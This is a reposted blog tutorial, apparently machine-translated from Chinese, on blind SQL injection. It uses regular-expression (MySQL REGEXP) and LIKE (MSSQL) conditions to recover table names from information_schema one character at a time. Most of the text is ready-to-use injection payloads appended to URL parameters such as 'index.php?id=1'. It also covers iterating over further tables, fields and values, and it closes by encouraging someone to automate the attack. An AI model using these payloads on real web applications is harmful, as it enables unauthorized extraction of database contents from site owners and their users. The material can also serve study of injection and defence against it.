Regular expression attacks on SQL blinds

Transferred from: http://hi.baidu.com/zh2089/item/819d2373d7834728d7a89c9e

Hray Note: Although the injection has been talking, but really proficient and can have how many people, a blind article, reproduced, convenient for themselves, but also hope that they have help

The previous blog post has already mentioned time-based injection attacks, but using regular expressions to make blind bets can save a lot of times:

-----------------------------------------MYSQL 5+-----------------------------------------

As we all know, in MySQL 5+, all the library names, indicating and field name information are stored in the INFORMATION_SCHEMA library. The attack mode is as follows:

1. Determine if the first character of the first table name is a character in a-Z, where Blind_sqli is the assumed known library name.

Note: ^[a-z in regular expressions] means that the start character in the string is within a-Z range

Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- Z] ' LIMIT 0,1)/*

2. Determine if the first character is a character in A-n

Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^[a- N] ' LIMIT 0,1)/*

3. Determine that the character is n

Index.php?id=1 and 1= (SELECT 1 from information_schema.tables WHERE table_schema= "Blind_sqli" and table_name REGEXP ' ^n ' L Imit 0,1)/*

4. The replacement of the expression is as follows

Expression like this: ' ^n[a-z] ', ' ^ne[a-z ', ' ^new[a-z ', ' ^news[a-z] ', FALSE

At this point the table name is news, to verify that the regular expression is ' ^news$ ', but it is not necessary to directly judge table_name = ' news ' is OK.

5. Next, guess the rest of the table. You only need to modify limit 2,1 to blind the next table.

-----------------------------------------------MSSQL---------------------------------------------------

The regular expression used by MSSQL is not a standard regular expression, and the expression uses the LIKE keyword

Default.asp?id=1 and 1= (select TOP 1 1 from information_schema.tables WHERE table_schema= ' blind_sqli ' and table_name like ' [a-z]% ')

In the query statement, select top 1 is a combination oh, don't look wrong.

If you want to query other table names, because you can't use limit x,1 like MySQL, you can only use table_name not in (the SELECT top x table_name from information_schema.tables) meaning: The table name does not In the first X line, in fact, the query is the first line x+1.

For example, query the table name for the second row:

Default.asp?id=1 and 1= (select TOP 1 1 from information_schema.tables WHERE table_schema= ' blind_sqli ' and table_name not I N (SELECT TOP 1 table_name from information_schema.tables) and table_name like ' [a-z]% ')

The order of the expressions:

' news[a-z]% ', ' new[a-z]% ', ' ne[a-z]% ', ' n[a-z]% '

The reason that the expression news[a-z] is returned after the query is correct is that the% should represent 0-n characters, and "_" is used to represent only one character. So confirm if there is any further word Fuk use the following expression

' news% ' TRUE ' News_ ' FALSE

Similarly, you can get the field, the value, in the same way. This is no longer described in detail here.

PS: Blind is a physical activity, but understand the principle, programming Daniel can consider implementing a software Oh!

Regular expression attacks on SQL blinds